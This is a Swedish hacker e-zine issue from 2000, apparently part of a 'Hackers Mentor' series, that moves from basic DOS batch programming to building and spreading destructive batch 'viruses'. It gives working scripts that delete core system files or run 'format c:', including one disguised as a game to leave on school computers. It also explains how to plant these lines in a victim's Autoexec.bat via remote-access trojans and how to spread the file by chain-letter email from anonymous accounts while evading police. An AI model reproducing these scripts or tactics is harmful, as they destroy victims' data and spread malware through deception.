_/HACKERS MENTOR\_ ----------------------------------------------------------------------------- Batch programmering - Skapa ett eget virus ***************************************************************************** Hejsan! Detta är nummer 11 av Hackers Mentor serien. Nu har boken av Hackers Mentor kommit ut! Boken heter: "The white book of Hackers Mentor". Alltså, efter vart 10ónde nya avsnitt så skapas en bok! Sammansatt av alla kapitel. Det kanske låter lite onödigt, och det är det också... Men det kan vara bra att ha ordning på stadierna i hacking världen. När 20 nummer har kommit ut så skapas "The Yellow book of Hackers Mentor". Sedan blir det; Orange, Red, Green, Blue, Purple, Brown & Black. Jepp,, ungeffär som ranknings-ordningen med karate bälten! Du kan ladda hem boken på: www.insecurefoundation.cjb.net. I Detta nummer: +------------------------------+ | * Batch programmering | | * Programmen i DOS | | * Skapa ett virus | | * Att sprida viruset | | * Att inte åka fast för det | +------------------------------+ * (En heldel fakta är hämtade ur GT(m)HH 2-2) * _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Kapitel 1: BATCH PROGRAMMERING Har du drömt om att kunna programmera? Att skapa ett virus som CIH eller så? Nu ska vi lära oss att skapa något som liknar ett virus, dock har det en snabbt aggerande sympton. Programmet som vi ska göra kommer att radera de viktigaste filerna i hårddisken så att man så gott som måste ominstallera datorn. * Detta är illegalt att använda på andras datorer, så om du inte vill lära dig hur man gör det, hoppa över kapitel 2! * Först och främst ska vi titta på hur programmering i DOS fungerar. DOS har ett eget, användarvänligt språk som kallas BATCH. När man öppnar DOS så kommer man till en "Prompt". Den ser offtast ut så här: C:\Windows\> Om du nu vill ändra katalog så skriver du bara: cd C:\ För att t.ex ändra till enhet C:\, utan någon katalog. Om du nu skulle skriva: "Autoexec" efter prompten, så skulle filen som DOS använder i datorns uppstart, startas. Filen Autoexec är en BAT-fil. Alltså, en BATCH fil. (C:\Autoexec.bat och C:\Command.com)- -är två filer som är nödvändiga för att datorn ska kuna köras. Men om de försvinner så är det bara att sätta i en Boot-diskett i diskettenheten och starta datorn. DOS är ju faktiskt det operativ system som du alltid använder, men bakom "skalet" Windows. Alltså, är Windows onödigt för en god DOS-operatör. Utan DOS så kan du fortfarande använda datorn så gott som obegränsat, så länge du har DOS inlaggt. Men om du har Windows utan DOS, så kommer ingenting fungera. Vi ska nu lära oss vilke filer som är viktigast för DOS och hur vi tar bort dem och andra filer genom DOS. Men först,,, BATCH-filerna. - En Batch fil är alltså en helt vanlig textfil i vilken du skriver lite DOS kod och sparar som T.ex. "Hej.bat" i C:\ - katalogen. Vi ska göra en testfil! §1. Skapa en ny textfil. §2. Öppna den och skriv in följande kod: @echo off echo Hej på dig själv, %1 - Spara filen som "Hej.bat" på C:\. Det filen gör, steg för steg är: 1. @echo off - Meddelar DOS att den inte ska skriva ut eko i fönstret, det vill säga, att den ska ignorera "echo"-kommandot och bara skriva ut det som står efter. 2. echo Hej på dig själv, %1 - echo, betyder ju att DOS ska skriva ut den följande texten. Vi har nu lagt till ett argument, genom att lägga till "%1". detta refererar till det första argumentet som skickas till filen. Det vill säga, När du nu sparat filen och gått ut i DOS så skriver du t.ex: C:\>Hej Johan När du klickar på {Enter} så kommer DOS att köra BAT filen vid namn Hej.bat på enhet C:\ och sedan talar filen om för DOS att det namn (Johan) som skrevs EFTER filnamnet, skaplaceras vid "%1"-koden. Vi kan skicka flera argument. För att demonstrera detta, skapa en fil med namnet "args.bat" och skriv in följande rader: @echo off echo ARGS: %1 %2 %3 %4 echo REV: %4 %3 %2 %1 echo MIXED: %2 %1 %4 %3 Kör nu filen med åtminstone två argument (du kan använda fler om du vill): c:\>args hej steve hund regn STEG 3 --Redirection När man programmerar i dom flesta språk, så finns det 3(tre) referenser som du bör veta: standard input (STDIN - vanligtvis tangentbordet) , Standard output (STDOUT - bildskärmen) , och standard error (STDERR - också bildskärmen). Men du kanske inte vill ha ut datan till bildskärmen utan att den skall lagras i en fil. detta kan göras på ett ganska enkelt sätt med någonting som kallas redirection. hur fungerar detta? Jo, när du skriver in någonting som t.ex. c:\>attrib /? För att få reda på vad kommandot attrib (attributen) gör och hur det används, du ser en massa information på bild skärmen. Försök att göra samma sak med "net" kommandot under Win95 och det ser ut som informationen bara försvinner i från bildskärmen! Så för att skicka utdatan för kommandot till en fil, då lägger du bara till symbolen större-än (>) och ett fil namn till kommandot: c:\>net /? > net.txt Om du vill lägga till eller append information till en redan existerande fil, då använder du dubbla större-än symboler: c:\>net view /? >> net.txt **************************************************** Trick att Pröva: Jag skall inte skriva om HTML programmering här men här är någonting du kan försöka. Varje websida har några bas kommandon.. dessa är taggarna för att bestämma huvudet, titel, för att ändra tecken storlek och färg m.m. Skriv en batch fil som tar utdatan för en serie kommandon, som t.ex. "net", " net view", "net use", net user", och "net time" och lägg dom i en HTML fil. genom detta kan du lägga upp dom på webben. Du kan till och med inkludera länkar m.m. **************************************************** STEG 4 -- Autoexec.bat Nu är det dags för kungen bland alla batch filer, Autoexec.bat filen. Detta är filen som används av DOS vid uppstarten av datorn och finns för DOS och Win95 (Win3.1 körs ovan på DOS och kallas på i autoexec.bat filen). Använd autoexec.bat "för att ställa in din hårdvaras specifikationer, personifiera hur MS-DOS visas, och starta minnes krävande program" (från MS-DOS användare guide). Du kan göra en massa intressanta saker med denna filen... eller vilken annan batch fil som helst. Notering för NT: NT använder ingen autoexec.bat fil, men det finns en register nyckel som när den är inställd riktigt, då kan du få tillgång till ett liknande upplägg som en autoexec.bat fil, den är för miljö variabler. Undrar vad den kan göra mer.... ***************************************************** Genialt tips: Ta en titt på prompt kommandot genom att skriva: c:\>prompt /? Testa lite olika inställningar. Genom att skriva kommandot för att ändra utseendet på den nuvarande kommando promten ändrar den bara för tillfället....genom att lägga till kommandot i autoexec.bat filen ändrar den för alltid. ***************************************************** STEG 5 -- Aliases Du kommer att upptäcka att när du skriver: c:\>notepad somefile.txt Då öppnas Anteckningar (Notepad) med den aktuella filen och i DOS fönstret får du din prompt tillbaka. Om du vill ha ett snabbt sätt att öppna text filer, skapa en liten fil med namnet "np.bat", och som innehåller raderna: @echo off notepad %1 Nu behöver du bara skriva "np" och filnamnet. **************************************************** Genialiskt Trick: Här är ett sätt att skapa en egen liten mini-syslog daemon på din egen dator....eller någon annans. Skapa en fil med namnet "file.log" eller nått annat namn du tycker, på ditt offers dator i Windows mappen. Tips: Undersök kommandot "attrib" och var speciellt intresserad av "h" möjligheten. Skapa nu en batch fil som skriver till filen file.log. Du kanske skall ha det som skrev eller bara vilken fil som öppnades. Klicka nu Start ->Hjälp, skriv nu in "associera" och öppna upp "så här ändrar du vilket program som startas när du öppnar en fil". Ändra nu associerande för ".txt" till att peka mot din batch fil, och var säker på att den sista raden är: notepad %1 Om din kompis använder Microsoft Word mycket, gör ändringar för den också. **************************************************** **************************************************** Smart tips: Om du gillar Un*x kommandon, men inte har lust att ladda ner dom, skriv dina egna då istället. Skapa en batch fil med namnet "ls.bat" och använd "dir" kommandot för att konfiguera skärmen. Börja med: @echo off dir %1 Var noga med att titta vilka brytare som finns för kommandot dir... **************************************************** STEG 6 -- Samla Information Det finns många kommandon för att samla information, speciellt på en nätverks dator. Dessa kommandon kan användas för fel sökningar, liksom att användas för andra egenskaper (inga tips och tricks här lite grann får du tänka ut själv). Börja genom att köra följande kommandon på din dator medan du är kopplad till ett nätverk eller internet: nbtstat -c nbtstat -n netstat -an net user (NT only) net use/config/time/view arp -a Nu när du börjar se vad för information som finns kan du modifiera kommandona så att dom följer dina behov, och skriv en batch fil för dom som skriver utdatan till en log fil eller nått. _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Kapitel 2: ATT SKAPA ETT EGET VIRUS _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Som sagt, du har säkert drömmt om att skapa ett eget virus eller åt minstone ett elakt program som skapar oårdning i datorn.?±÷¡·×Ð? Jo, vi ska göra ett par sneekiga BATCH filer som sabbar din eller någon annans dator! -= MaGiC =- Detta programmet skrev jag för ett par månader sedan. Vad det gör är att skriva ett litet meddelande och radera de viktigaste filerna på hårddisken. 1. Skapa en ny textfil. 2. Skriv in följande kod: @echo off echo //\\ echo // \\ echo //* *\\ echo \\ / // echo \\_ // echo \\// echo ~~ echo Kenny echo IS echo DEAD!!! echo ......... echo And so are your harddrive! echo Never forget MATHREON, ICECODER, NEIRO or What eather you like to call me!! echo Stupid fuckers like U should´nt play with computers at all, echo Now, my lovley B.A.T.C.H file have to delete your ass!!! echo............................................................................. echo You fucked off the line. Bye! DEL C:\Autoexec.bat DEL C:\Command.com DEL C:\Windows\Explorer.exe DEL C:\Windows\Telenet.exe DEL C:\Windows\Ftp.exe DEL C:\Windows\Net.exe DEL C:\Windows\Tracert.exe DEL C:\Windows\Ping.exe DEL C:\Windows\Calc.exe DEL C:\Windows\desktop.ini DEL C:\Windows\Msdos.sys DEL C:\Windows\Notepad.exe DEL C:\Windows\Progman.exe DEL C:\Windows\Progman.ini DEL C:\Windows\Regedit.exe DEL C:\Windows\Route.exe DEL C:\Windows\Rundll.exe DEL C:\Windows\Rundll32.exe DEL C:\Windows\Scandskw.exe DEL C:\Windows\Scanregw.exe DEL C:\Windows\Winfile.exe DEL C:\Windows\Write.exe DEL C:\Windows\System\Sysedit.exe DEL C:\Windows\System\Systray.exe DEL C:\Windows\System32\Desktop.ini 3. Nu sparar du filen i någon konstig katalog på C:\, med namnet magic.bat Typ: C:\g6m77hqm\blahsfrm\magic.bat Spara filen på diskett, vi ska använda den senare. - MEN VAD DU ÄN GÖR, STARTA DEN INTE!!! _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Program nr 2: MegaRally 5. Här är ett annat program som du kan göra... Programmet ser ut som ett spel, när du ändrar ikon och så.. ;) Lägg det på skoldatorernas skrivbord! Skapa en fil med namnet "MegaRally5.bat" på disketten. I filen ska denna kod finnas: @echo off echo Hacker VS Neiro talked at mIRC.... echo ---------------------------------------------------------------- echo Neiro - And we will rule the world! echo Hacker - And people will adore us. echo Neiro - And the cops will fear us. echo Hacker - And the peoples computers will suddenly fuck off the line. echo Neiro - Jupp, - So never fuck with the L.O.W.A.N.G! Format C: Så var det klart!. Startar någon filen så raderas hårddisken! _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Program nr 3: LoveGame. ------ börja kopiera under denna linie ------- Neiro is best! Neiro is better! NEIRO SIND BESTE! ------ Sluta kopiera över denna linie ------ Spara filen på disketten som: "Lovegame.bat". Resultatet blev iaf för mig att Texten: "Neiro is best! Neiro is better! NEIRO SIND BESTE!" - började rulla över skärmen med en massa C:\>-promptar på sidan om sig. Ganska roligt!,,, (?) _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Sista knepet. Öppna din ovänns Autoexec.bat - fil! Skriv in denna kod först eller sist i filen: DEL C:\Autoexec.bat DEL C:\Command.com DEL C:\Windows\Explorer.exe DEL C:\Windows\Telenet.exe DEL C:\Windows\Ftp.exe DEL C:\Windows\Net.exe DEL C:\Windows\Tracert.exe DEL C:\Windows\Ping.exe DEL C:\Windows\Calc.exe DEL C:\Windows\desktop.ini DEL C:\Windows\Msdos.sys DEL C:\Windows\Notepad.exe DEL C:\Windows\Progman.exe DEL C:\Windows\Progman.ini DEL C:\Windows\Regedit.exe DEL C:\Windows\Route.exe DEL C:\Windows\Rundll.exe DEL C:\Windows\Rundll32.exe DEL C:\Windows\Scandskw.exe DEL C:\Windows\Scanregw.exe DEL C:\Windows\Winfile.exe DEL C:\Windows\Write.exe DEL C:\Windows\System\Sysedit.exe DEL C:\Windows\System\Systray.exe DEL C:\Windows\System32\Desktop.ini eller denna kod: format a: format c: Den första koden kommer att radera en massa filer på hårddisken så fort din ovän startar datorn... Den andra koden kommer att försöka radera (den eventuella) disketten som sitter i. Går inte det så raderar den hårddisken. (Om din ovän har en startup diskett i enhet A:\ så kommer den att raderas, när det är klart så kommer den fortsätta med C:\. Om din ovän inte har fler startup disketter så måste han/hon lämna in datorn på lagning och riskera att förlora allt på datorn. Jag är inte säker, men jag tror att om formateringen av C:\ hinner startas, så kommer den fortsätta även om din ovän startar om datorn innan den har formaterats. Det går inte att avbryta! Sakta men säkert så kommer din oväns dator formateras varesej hon vill eller inte. Så, det är ett bra tips om du har Netbus eller BO på någons dator, att ladda upp din egna version av Autoexec.bat filen till dennes dator, (enhet C:\ och ingen underkatalog!). Ta det lugnt bara! PS; Du kan ändra så att datorn bara formaterar disketten eller bara hårddisken ELLER även fler enheter genom att radera/lägga till olika format C: - kommandon. Diskett enhet = A: Hårddisk: = C: CD-ROM Enhet = D: Brännar Enhet = E: Nätverksenhet = F/G/H/I: o.s.v ^- De flesta datorer följer dessa enhetsbeteckningar. Det är bara att kolla! ********************************************************************* ********************************************************************* Ett annat hett tips är att öppna Autoexec.bat filen på din oväns dator, sudda allt som står i den och kopiera in denna text: @cd>>x @%0 Detta kommer att sabba datorn totalt! ;-] - Orkar inte förklara hur det fungerar doh! _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Kapitel 3: ATT SPRIDA VIRUSET _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Nu kommer din diskett väl till pass! 1. Gå till en skola, ett bibliotek eller nåt ställe där det finns datorer att boka/låna. OBS; Om du bokar en dator, ANGE ALDRIG DITT RIKTIGA NAMN, E.T.C.. !!! Om det händer något olaglit så spåras IP adressen till det lokala nätverket och sedan till den dator du satt vid, de kollar vilken tid det olagliga inträffade, och de ger polisen det namn som satt vid just den datorn den tiden! 2. När du har en dator så sätter du in disketten och LÅT BLI ATT STARTA PROGRAMMEN!!!! 3. Gå till Hotmail eller något sådant och registrera en ny mail adress, (ANONYM! Ange inga riktiga namn, nummer, adresser mm,,!) 4. Gå in på en gammal mailbox och öppna ett kedjebrev. Kopiera alla adresserna ur listan du ser.. (Till vilka som mailet har skickats). 5. Gå till din nya mailbox och kopiera in alla mail adresserna i "CC" - fältet. I "To:" -fältet skriver du din egen adress. Nu ska adresserna i "CC:"-fältet vara frånskiljda med komma-tecknen. Så om adresserna: johan@epost.com & nils@mail.nu & carina@inkspot.com skulle stå där, skulle det se ut så här: johan@epost.com, nils@mail.nu, carina@inkspot.com Eftersom att alla dessa har svarat på kedjebrevet så är de bevisligen väldigt IQ-befriade! (De svarar på kedjebrev). 6. Skriv ett mail typ; "Vill du stoppa kärleken?". " Om du inte vill att kärleken över internet ska stoppas så är det bäst att du skickar detta mail. Du kommer själv att träffa din största kärlek: Den 13´Juli, År: 2001... Detta meddelande kommer ändras för varje person som får mailet. För att det ska slå in så måste du befinna dig på Passagens chat "Amore" just det lyckliga datumet! Om du inte vill att dina kompisar ska sakna en partner för resten av livet, skicka mailet till minst 10 av dina vänner och under tiden du väntar på svar så kan du kolla på den underbara special videon med Leonardo Dicaprio och Jenny- M´Cartny som följde med mailet. Klicka på länken för att öppna biografens dörrar! Och glöm inte bort dina vänners kommande lycka! /Amor´s E-Pil" Nu kommer varenda j¨vel att svara på mailet, skicka det vidare till MINST 10 kompisar samt öppna filen! Detta kommer få kedjebrevs-svararna att tänka lite innan de öppnar bifogad E-Post! 7. Det bör finnas en knapp för att lägga till en fil någon stans... Klicka där, välj "Browse" när du kommit in, leta fram filen, klicka "OK" och... 8. Skicka Mailen och glöm bort att du någonsin gjort det! ;) _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ ATT HÅLA SIG BORTA FRÅN POLISEN... Det enda tips jag kan ge dig här, förutom att låta bli all olaglig programmering och spridning av programmen, är att kopiera koden till programmet på diskett.. Gå till ett bibliotek, boka en dator med falskt namn, sätta i disketten, skapa en BATCH fil av koden och sedan registrera en anonym mailbox från vilken du skickar mailet med den bifogade filen! Ta det FRUKTANSVÄRT lugnt! /Neiro _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ _^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_^_ Mera Information Jag har samlat ihop några sajter som har mer detaljerad information om batch fil programmering. Dom innehåller allt från exempel till skolor för att lära dig batch fil programmering.... så ta gärna en titt. BATCH FIL PROGRAMMERING SAJTER ftp://garbo.uwasa.fi/pc/ts/tsbat53.zip http://gearbox.maem.umr.edu/~batch/ http://www.nc5.infi.net/~wtnewton/batch/index.html http://purl.oclc.org/net/dirk/batcoll.all http://purl.oclc.org/net/dirk/batvirus.all http://www.deltaelectronics.com/tglbatch/ ----------------------------------------------------------------------------- Ha det bra tills nästa nummer kommer! /Mathreon som inte vet vad han ska heta. ----------------------------------------------------------------------------- I nästa nummer: Ska vi börja prata om Phreaking, hur du släcker ett kvarter, hittar skåp, verktyg, släcker gatlyktor på ett skojjit sätt och hur du fipplar med elräkningarna! Nummer #12 kommer om en eller två veckor. ------------------------------------------------------------------------- Du hittar alla tidigare delar av "Hackers Mentor" på vår hemsida: www.insecurefoundation.cjb.net ^------ Prenummeranter är alltid först med att få senaste nummret. ************************************************************************* Hackers Mentor guiderna ingår i "Hackies"-serien. Där du också kan hitta böcker som "BBS för Hackies", "Telenet för Hackies", "CC För Hackies" mm... Vi har ett brett sortiment böcker, tidningar och guider om hacking, cracking och phreaking mm... Du hittar våra texter på: www.insercurefoundation.cjb.net . Där kan du också hitta BOK VERSIONEN AV HACKERS MENTOR av icecoder och ett flertal andra författare. Boken är gratis och läggs upp i nya upplagor ju längre guiden Hackers Mentor kommer. Gå gärna dit och ladda hem boken! Nästan alla våra texter är gratis och du kommer ha stor nytta av dem. *************************************************************************** Du får gärna lägga upp denna text på din hemsida så länge dess inehåll är orört! Alla rättigheter är reserverade; icecoder för A.C.S Sweden. 2000-03-19. --------------------------------------------------------------------------- En del i "Hackies serien".Av icecoder Du kan också hitta mig på DALNet. IRC kanalen: #Hackers! (Med ett ! på slutet!)